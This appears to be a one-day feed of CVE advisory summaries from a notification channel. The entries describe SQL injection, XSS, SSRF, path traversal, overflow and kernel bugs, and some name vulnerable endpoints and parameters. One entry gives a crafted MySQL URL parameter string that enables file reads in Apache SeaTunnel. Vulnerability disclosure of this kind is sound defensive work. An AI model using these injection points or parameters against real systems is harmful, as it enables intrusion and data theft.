| 2024-08-21 19:37:32 |
🚨 CVE-2024-7742A vulnerability was found in wanglongcn ltcms 1.0.20. It has been classified as critical. Affected is the function multiDownload of the file /api/file/multiDownload of the component API Endpoint. The manipulation of the argument file leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-21 19:37:26 |
🚨 CVE-2024-7741A vulnerability was found in wanglongcn ltcms 1.0.20 and classified as critical. This issue affects the function downloadFile of the file /api/file/downloadfile of the component API Endpoint. The manipulation of the argument file leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-21 19:37:25 |
🚨 CVE-2024-41053In the Linux kernel, the following vulnerability has been resolved:scsi: ufs: core: Fix ufshcd_abort_one racing issueWhen ufshcd_abort_one is racing with the completion ISR, the completed tagof the request's mq_hctx pointer will be set to NULL by ISR. Returnsuccess when request is completed by ISR because ufshcd_abort_one does notneed to do anything.The racing flow is:Thread Aufshcd_err_handler step 1 ... ufshcd_abort_one ufshcd_try_to_abort_task ufshcd_cmd_inflight(true) step 3 ufshcd_mcq_req_to_hwq blk_mq_unique_tag rq->mq_hctx->queue_num step 5Thread Bufs_mtk_mcq_intr(cq complete ISR) step 2 scsi_done ... __blk_mq_free_request rq->mq_hctx = NULL; step 4Below is KE back trace. ufshcd_try_to_abort_task: cmd at tag 41 not pending in the device. ufshcd_try_to_abort_task: cmd at tag=41 is cleared. Aborting tag 41 / CDB 0x28 succeeded Unable to handle kernel NULL pointer dereference at virtual address 0000000000000194 pc : [0xffffffddd7a79bf8] blk_mq_unique_tag+0x8/0x14 lr : [0xffffffddd6155b84] ufshcd_mcq_req_to_hwq+0x1c/0x40 [ufs_mediatek_mod_ise] do_mem_abort+0x58/0x118 el1_abort+0x3c/0x5c el1h_64_sync_handler+0x54/0x90 el1h_64_sync+0x68/0x6c blk_mq_unique_tag+0x8/0x14 ufshcd_err_handler+0xae4/0xfa8 [ufs_mediatek_mod_ise] process_one_work+0x208/0x4fc worker_thread+0x228/0x438 kthread+0x104/0x1d4 ret_from_fork+0x10/0x20🎖@cveNotify |
|
| 2024-08-21 19:37:24 |
🚨 CVE-2024-41052In the Linux kernel, the following vulnerability has been resolved:vfio/pci: Init the count variable in collecting hot-reset devicesThe count variable is used without initialization, it results in mistakesin the device counting and crashes the userspace if the get hot reset infopath is triggered.🎖@cveNotify |
|
| 2024-08-21 19:07:31 |
🚨 CVE-2024-7740A vulnerability has been found in wanglongcn ltcms 1.0.20 and classified as critical. This vulnerability affects the function download of the file /api/test/download of the component API Endpoint. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-21 19:07:30 |
🚨 CVE-2024-7614A vulnerability was found in Tenda FH1206 1.2.0.8(8155). It has been classified as critical. Affected is the function fromqossetting of the file /goform/qossetting. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-21 19:07:26 |
🚨 CVE-2024-41332Incorrect access control in the delete_category function of Sourcecodester Computer Laboratory Management System v1.0 allows authenticated attackers with low-level privileges to arbitrarily delete categories.🎖@cveNotify |
|
| 2024-08-21 19:07:25 |
🚨 CVE-2024-40129Open5GS v2.6.4 is vulnerable to Buffer Overflow. via /lib/pfcp/context.c.🎖@cveNotify |
|
| 2024-08-21 19:07:24 |
🚨 CVE-2024-39036SeaCMS v12.9 is vulnerable to Arbitrary File Read via admin_safe.php.🎖@cveNotify |
|
| 2024-08-21 18:37:43 |
🚨 CVE-2024-42579A Cross-Site Request Forgery (CSRF) in the component add_group.php of Warehouse Inventory System v2.0 allows attackers to escalate privileges.🎖@cveNotify |
|
| 2024-08-21 18:37:42 |
🚨 CVE-2024-40893Multiple authenticated operating system (OS) command injection vulnerabilities exist in Firewalla Box Software versions before 1.979. A physically close attacker that is authenticated to the Bluetooth Low-Energy (BTLE) interface can use the network configuration service to inject commands in various configuration parameters including networkConfig.Interface.Phy.Eth0.Extra.PingTestIP, networkConfig.Interface.Phy.Eth0.Extra.DNSTestDomain, and networkConfig.Interface.Phy.Eth0.Gateway6. Additionally, because the configuration can be synced to the Firewalla cloud, the attacker may be able to persist access even after hardware resets and firmware re-flashes.🎖@cveNotify |
|
| 2024-08-21 18:37:41 |
🚨 CVE-2024-40892A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely).🎖@cveNotify |
|
| 2024-08-21 18:37:38 |
🚨 CVE-2024-36131An insecure deserialization vulnerability in web component of EPMM prior to 12.1.0.1 allows an authenticated remote attacker to execute arbitrary commands on the underlying operating system of the appliance.🎖@cveNotify |
|
| 2024-08-21 18:37:37 |
🚨 CVE-2024-28740Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component.🎖@cveNotify |
|
| 2024-08-21 18:37:36 |
🚨 CVE-2024-6736A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. It has been rated as critical. This issue affects some unknown processing of the file view_employee.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271457 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-21 18:37:35 |
🚨 CVE-2024-6728A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file typeedit.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271401 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-21 18:37:32 |
🚨 CVE-2024-39014ahilfoley cahil/utils v2.3.2 was discovered to contain a prototype pollution via the function set. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-08-21 18:37:31 |
🚨 CVE-2024-390132o3t-utility v0.1.2 was discovered to contain a prototype pollution via the function extend. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-08-21 18:07:34 |
🚨 CVE-2022-48775In the Linux kernel, the following vulnerability has been resolved:Drivers: hv: vmbus: Fix memory leak in vmbus_add_channel_kobjkobject_init_and_add() takes reference even when it fails.According to the doc of kobject_init_and_add()? If this function returns an error, kobject_put() must be called to properly clean up the memory associated with the object.Fix memory leak by calling kobject_put().🎖@cveNotify |
|
| 2024-08-21 18:07:27 |
🚨 CVE-2024-3779Denial of service vulnerability present shortly after product installation or upgrade, potentially allowed an attacker to render ESET’s security product inoperable, provided non-default preconditions were met.🎖@cveNotify |
|
| 2024-08-21 18:07:26 |
🚨 CVE-2024-24213Supabase PostgreSQL v15.1 was discovered to contain a SQL injection vulnerability via the component /pg_meta/default/query. NOTE: the vendor's position is that this is an intended feature; also, it exists in the Supabase dashboard product, not the Supabase PostgreSQL product. Specifically, /pg_meta/default/query is for SQL queries that are entered in an intended UI by an authorized user. Nothing is injected.🎖@cveNotify |
|
| 2024-08-21 17:50:37 |
https://t.me/malwr |
|
| 2024-08-21 17:37:25 |
🚨 CVE-2024-34515image-optimizer before 1.7.3 allows PHAR deserialization, e.g., the phar:// protocol in arguments to file_exists().🎖@cveNotify |
|
| 2024-08-21 16:37:38 |
🚨 CVE-2024-22277VMware Cloud Director Availability contains an HTML injection vulnerability. A malicious actor with network access to VMware Cloud Director Availability can craft malicious HTML tags to execute within replication tasks.🎖@cveNotify |
|
| 2024-08-21 16:37:37 |
🚨 CVE-2022-25478Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 provides read and write access to the PCI configuration space of the device.🎖@cveNotify |
|
| 2024-08-21 16:37:33 |
🚨 CVE-2022-25477Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 leaks driver logs that contain addresses of kernel mode objects, weakening KASLR.🎖@cveNotify |
|
| 2024-08-21 16:37:32 |
🚨 CVE-2024-27375An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_followup_get_nl_params(), there is no input validation check on hal_req->sdea_service_specific_info_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-08-21 16:37:31 |
🚨 CVE-2024-27371An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_followup_get_nl_params(), there is no input validation check on hal_req->service_specific_info_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-08-21 16:37:30 |
🚨 CVE-2024-36550idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admin/vpsCompany_deal.php?mudi=add&nohrefStr=close🎖@cveNotify |
|
| 2024-08-21 16:37:26 |
🚨 CVE-2024-28340An information leak in the currentsetting.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.🎖@cveNotify |
|
| 2024-08-21 16:37:25 |
🚨 CVE-2019-16220In WordPress before 5.2.3, validation and sanitization of a URL in wp_validate_redirect in wp-includes/pluggable.php could lead to an open redirect if a provided URL path does not start with a forward slash.🎖@cveNotify |
|
| 2024-08-21 16:07:45 |
🚨 CVE-2024-7885A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.🎖@cveNotify |
|
| 2024-08-21 16:07:44 |
🚨 CVE-2020-11847SSH authenticated user when access the PAM server can execute an OS command to gain the full system access using bash. This issue affects Privileged Access Manager before 3.7.0.1.🎖@cveNotify |
|
| 2024-08-21 16:07:43 |
🚨 CVE-2020-11850Improper Input Validation vulnerability in OpenText Self Service Password Reset allows Cross-Site Scripting (XSS). This issue affects Self Service Password Reset before 4.5.0.2 and 4.4.0.6🎖@cveNotify |
|
| 2024-08-21 16:07:38 |
🚨 CVE-2024-39690Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.🎖@cveNotify |
|
| 2024-08-21 16:07:37 |
🚨 CVE-2024-8005A vulnerability was found in demozx gf_cms 1.0/1.0.1. It has been classified as critical. This affects the function init of the file internal/logic/auth/auth.go of the component JWT Authentication. The manipulation leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.2 is able to address this issue. The patch is named be702ada7cb6fdabc02689d90b38139c827458a5. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-08-21 16:07:33 |
🚨 CVE-2024-6379An URL redirection to untrusted site (open redirect) vulnerability affecting 3DPassport in 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to redirect users to an arbitrary website via a crafted URL.🎖@cveNotify |
|
| 2024-08-21 16:07:32 |
🚨 CVE-2024-6377A reflected Cross-site Scripting (XSS) vulnerability affecting 3DSwymer from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session.🎖@cveNotify |
|
| 2024-08-21 16:07:31 |
🚨 CVE-2024-42608Pligg CMS v2.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/submit_page.php.🎖@cveNotify |
|
| 2024-08-21 16:07:27 |
🚨 CVE-2022-25480Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 allows writing to kernel memory beyond the SystemBuffer of the IRP.🎖@cveNotify |
|
| 2024-08-21 16:07:26 |
🚨 CVE-2024-39303Weblate is a web based localization tool. Prior to version 5.6.2, Weblate didn't correctly validate filenames when restoring project backup. It may be possible to gain unauthorized access to files on the server using a crafted ZIP file. This issue has been addressed in Weblate 5.6.2. As a workaround, do not allow untrusted users to create projects.🎖@cveNotify |
|
| 2024-08-21 16:07:25 |
🚨 CVE-2024-5018In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Path Traversal vulnerability exists Wug.UI.Areas.Wug.Controllers.SessionController.LoadNMScript. This allows allows reading of any file from the applications web-root directory .🎖@cveNotify |
|
| 2024-08-21 15:07:33 |
🚨 CVE-2024-27712An issue in Eskooly Free Online School management Software v.3.0 and before allows a remote attacker to escalate privileges via the User Account Mangemnt component in the authentication mechanism.🎖@cveNotify |
|
| 2024-08-21 15:07:32 |
🚨 CVE-2024-27711An issue in Eskooly Free Online School management Software v.3.0 and before allows a remote attacker to escalate privileges via the Sin-up process function in the account settings.🎖@cveNotify |
|
| 2024-08-21 15:07:31 |
🚨 CVE-2024-38474Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts indirectories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI.Users are recommended to upgrade to version 2.4.60, which fixes this issue.Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.🎖@cveNotify |
|
| 2024-08-21 15:07:30 |
🚨 CVE-2024-37146Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/credentials/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.🎖@cveNotify |
|
| 2024-08-21 15:07:28 |
🚨 CVE-2024-37145Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.🎖@cveNotify |
|
| 2024-08-21 15:07:27 |
🚨 CVE-2024-35156IBM MQ 9.3 LTS and 9.3 CD could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 292766.🎖@cveNotify |
|
| 2024-08-21 15:07:25 |
🚨 CVE-2024-35116IBM MQ 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.3 LTS, and 9.3 CD is vulnerable to a denial of service attack caused by an error applying configuration changes. IBM X-Force ID: 290335.🎖@cveNotify |
|
| 2024-08-21 14:37:27 |
🚨 CVE-2021-22197An issue has been discovered in GitLab CE/EE affecting all versions starting from 10.6 where an infinite loop exist when an authenticated user with specific rights access a MR having source and target branch pointing to each other🎖@cveNotify |
|
| 2024-08-21 14:37:26 |
🚨 CVE-2021-22196An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4. It was possible to exploit a stored cross-site-scripting in merge request via a specifically crafted branch name.🎖@cveNotify |
|
| 2024-08-21 14:37:25 |
🚨 CVE-2019-6781An Improper Input Validation issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It was possible to use the profile name to inject a potentially malicious link into notification emails.🎖@cveNotify |
|
| 2024-08-21 14:07:47 |
🚨 CVE-2024-42575School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the medium parameter at substaff.php.🎖@cveNotify |
|
| 2024-08-21 14:07:45 |
🚨 CVE-2024-42574School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the medium parameter at attendance.php.🎖@cveNotify |
|
| 2024-08-21 14:07:44 |
🚨 CVE-2024-42573School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the medium parameter at dtmarks.php.🎖@cveNotify |
|
| 2024-08-21 14:07:43 |
🚨 CVE-2024-42572School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the medium parameter at unitmarks.php.🎖@cveNotify |
|
| 2024-08-21 14:07:39 |
🚨 CVE-2024-42570School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the medium parameter at admininsert.php.🎖@cveNotify |
|
| 2024-08-21 14:07:38 |
🚨 CVE-2024-42566School Management System commit bae5aa was discovered to contain a SQL injection vulnerability via the password parameter at login.php🎖@cveNotify |
|
| 2024-08-21 14:07:37 |
🚨 CVE-2024-423357Twenty - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')🎖@cveNotify |
|
| 2024-08-21 14:07:33 |
🚨 CVE-2024-7948A vulnerability classified as problematic was found in SourceCodester Accounts Manager App 1.0. This vulnerability affects unknown code of the file update-account.php of the component Update Account Page. The manipulation of the argument Account Name/Username/Password/Link leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-21 14:07:32 |
🚨 CVE-2024-7946A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file register.php of the component User Signup. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-21 14:07:31 |
🚨 CVE-2023-50954IBM InfoSphere Information Server 11.7 returns sensitive information in URL information that could be used in further attacks against the system. IBM X-Force ID: 275776.🎖@cveNotify |
|
| 2024-08-21 14:07:27 |
🚨 CVE-2024-5017In WhatsUp Gold versions released before 2023.1.3, a path traversal vulnerability exists. A specially crafted unauthenticated HTTP request to AppProfileImport can lead can lead to information disclosure.🎖@cveNotify |
|
| 2024-08-21 14:07:26 |
🚨 CVE-2021-22201An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.9. A specially crafted import file could read files on the server.🎖@cveNotify |
|
| 2024-08-21 13:07:25 |
🚨 CVE-2024-42621Pligg CMS v2.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/admin_editor.php🎖@cveNotify |
|
| 2024-08-21 13:07:24 |
🚨 CVE-2024-43380fugit contains time tools for flor and the floraison group. The fugit "natural" parser, that turns "every wednesday at 5pm" into "0 17 * * 3", accepted any length of input and went on attempting to parse it, not returning promptly, as expected. The parse call could hold the thread with no end in sight. Fugit dependents that do not check (user) input length for plausibility are impacted. A fix was released in fugit 1.11.1.🎖@cveNotify |
|
| 2024-08-21 12:37:42 |
🚨 CVE-2024-42612Pligg CMS v2.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/domain_management.php?whitelist_add🎖@cveNotify |
|
| 2024-08-21 12:37:41 |
🚨 CVE-2024-43408Discourse Placeholder Forms will let you build dynamic documentation. Unsanitized and stored user input was injected in the html of the post. The vulnerability is fixed in commit a62f711d5600e4e5d86f342d52932cb6221672e7.🎖@cveNotify |
|
| 2024-08-21 12:37:37 |
🚨 CVE-2024-42598SeaCMS 13.0 has a remote code execution vulnerability. The reason for this vulnerability is that although admin_editplayer.php imposes restrictions on edited files, attackers can still bypass these restrictions and write code, allowing authenticated attackers to exploit the vulnerability to execute arbitrary commands and gain system privileges.🎖@cveNotify |
|
| 2024-08-21 12:37:36 |
🚨 CVE-2024-27186The mail template feature lacks an escaping mechanism, causing XSS vectors in multiple extensions.🎖@cveNotify |
|
| 2024-08-21 12:37:32 |
🚨 CVE-2024-27184Inadequate validation of URLs could result into an invalid check whether an redirect URL is internal or not..🎖@cveNotify |
|
| 2024-08-21 12:37:31 |
🚨 CVE-2024-7921A vulnerability has been found in Anhui Deshun Intelligent Technology Jieshun JieLink+ JSOTC2016 up to 20240805 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /report/ParkOutRecord/GetDataList. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-21 12:37:30 |
🚨 CVE-2024-44076In Microcks before 1.10.0, the POST /api/import and POST /api/export endpoints allow non-administrator access.🎖@cveNotify |
|
| 2024-08-21 12:37:27 |
🚨 CVE-2024-44073The Miniscript (aka rust-miniscript) library before 12.2.0 for Rust allows stack consumption because it does not properly track tree depth.🎖@cveNotify |
|
| 2024-08-21 12:37:26 |
🚨 CVE-2024-7920A vulnerability, which was classified as problematic, was found in Anhui Deshun Intelligent Technology Jieshun JieLink+ JSOTC2016 up to 20240805. Affected is an unknown function of the file /Report/ParkCommon/GetParkInThroughDeivces. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-21 11:07:25 |
🚨 CVE-2024-42680An issue in Super easy enterprise management system v.1.0.0 and before allows a local attacker to obtain the server absolute path by entering a single quotation mark.🎖@cveNotify |
|
| 2024-08-21 11:07:24 |
🚨 CVE-2024-42679SQL Injection vulnerability in Super easy enterprise management system v.1.0.0 and before allows a local attacker to execute arbitrary code via a crafted script to the/ajax/Login.ashx component.🎖@cveNotify |
|
| 2024-08-21 10:37:25 |
🚨 CVE-2023-49198Mysql security vulnerability in Apache SeaTunnel.Attackers can read files on the MySQL server by modifying the information in the MySQL URL allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360This issue affects Apache SeaTunnel: 1.0.0.Users are recommended to upgrade to version [1.0.1], which fixes the issue.🎖@cveNotify |
|
| 2024-08-21 10:37:24 |
🚨 CVE-2023-22576Dell Repository Manager version 3.4.2 and earlier, contain a Local Privilege Escalation Vulnerability in Installation module. A local low privileged attacker may potentially exploit this vulnerability leading to the execution of arbitrary executable on the operating system with high privileges using the existing vulnerability in operating system. Exploitation may lead to unavailability of the service.🎖@cveNotify |
|
| 2024-08-21 08:58:54 |
None |
|
| 2024-08-21 08:37:25 |
🚨 CVE-2024-1459A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.🎖@cveNotify |
|
| 2024-08-21 07:37:25 |
🚨 CVE-2022-48867In the Linux kernel, the following vulnerability has been resolved:dmaengine: idxd: Prevent use after free on completion memoryOn driver unload any pending descriptors are flushed at thetime the interrupt is freed:idxd_dmaengine_drv_remove() -> drv_disable_wq() -> idxd_wq_free_irq() -> idxd_flush_pending_descs().If there are any descriptors present that need to be flushed thisflow triggers a "not present" page fault as below: BUG: unable to handle page fault for address: ff391c97c70c9040 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present pageThe address that triggers the fault is the address of thedescriptor that was freed moments earlier via:drv_disable_wq()->idxd_wq_free_resources()Fix the use after free by freeing the descriptors after any possibleusage. This is done after idxd_wq_reset() to ensure that the memoryremains accessible during possible completion writes by the device.🎖@cveNotify |
|
| 2024-08-21 06:37:43 |
🚨 CVE-2024-7647The OTA Sync Booking Engine Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.7. This is due to missing or incorrect nonce validation on the otasync_widget_settings_fnc() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-08-21 06:37:36 |
🚨 CVE-2024-7134The LiquidPoll – Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘form_data’ parameter in all versions up to, and including, 3.3.78 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-21 06:37:35 |
🚨 CVE-2024-7032The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database.🎖@cveNotify |
|
| 2024-08-21 06:37:31 |
🚨 CVE-2024-6883The Event Espresso 4 Decaf – Event Registration Event Ticketing plugin for WordPress is vulnerable to limited unauthorized plugin settings modification due to a missing capability check on the saveTimezoneString and some other functions in all versions up to, and including, 5.0.22.decaf. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify some of the plugin settings.🎖@cveNotify |
|
| 2024-08-21 06:37:30 |
🚨 CVE-2024-6568The Flamix: Bitrix24 and Contact Form 7 integrations plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.1.0. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-08-21 06:37:26 |
🚨 CVE-2024-6508An insufficient entropy vulnerability was found in the Openshift Console. In the authorization code type and implicit grant type, the OAuth2 protocol is vulnerable to a Cross-Site Request Forgery (CSRF) attack if the state parameter is used inefficiently. This flaw allows logging into the victim’s current application account using a third-party account without any restrictions.🎖@cveNotify |
|
| 2024-08-21 06:37:25 |
🚨 CVE-2024-6780Improper permission control in the mobile application (com.android.server.telecom) may lead to user information security risks.🎖@cveNotify |
|
| 2024-08-21 06:37:24 |
🚨 CVE-2024-5163Improper permission settings for mobile applications (com.transsion.carlcare) may lead to user password and account security risks.🎖@cveNotify |
|
| 2024-08-21 05:37:24 |
🚨 CVE-2024-42939A cross-site scripting (XSS) vulnerability in the component /index/index.html of YZNCMS v1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the configured remarks text field.🎖@cveNotify |
|
| 2024-08-21 04:37:33 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-08-21 03:37:25 |
🚨 CVE-2024-4988The mobile application (com.transsion.videocallenhancer) interface has improper permission control, which can lead to the risk of private file leakage.🎖@cveNotify |
|
| 2024-08-21 03:37:24 |
🚨 CVE-2024-3701The system application (com.transsion.kolun.aiservice) component does not perform an authentication check, which allows attackers to perform malicious exploitations and affect system services.🎖@cveNotify |
|
| 2024-08-21 00:37:47 |
🚨 CVE-2024-43868In the Linux kernel, the following vulnerability has been resolved:riscv/purgatory: align riscv_kernel_entryWhen alignment handling is delegated to the kernel, everything must beword-aligned in purgatory, since the trap handler is then set to thekexec one. Without the alignment, hitting the exception wouldultimately crash. On other occasions, the kernel's handler would takecare of exceptions.This has been tested on a JH7110 SoC with oreboot and its SBI delegatingunaligned access exceptions and the kernel configured to handle them.🎖@cveNotify |
|
| 2024-08-21 00:37:46 |
🚨 CVE-2024-43867In the Linux kernel, the following vulnerability has been resolved:drm/nouveau: prime: fix refcount underflowCalling nouveau_bo_ref() on a nouveau_bo without initializing it (andhence the backing ttm_bo) leads to a refcount underflow.Instead of calling nouveau_bo_ref() in the unwind path ofdrm_gem_object_init(), clean things up manually.(cherry picked from commit 1b93f3e89d03cfc576636e195466a0d728ad8de5)🎖@cveNotify |
|
| 2024-08-21 00:37:42 |
🚨 CVE-2024-43865In the Linux kernel, the following vulnerability has been resolved:s390/fpu: Re-add exception handling in load_fpu_state()With the recent rewrite of the fpu code exception handling for thelfpc instruction within load_fpu_state() was erroneously removed.Add it again to prevent that loading invalid floating point registervalues cause an unhandled specification exception.🎖@cveNotify |
|
| 2024-08-21 00:37:41 |
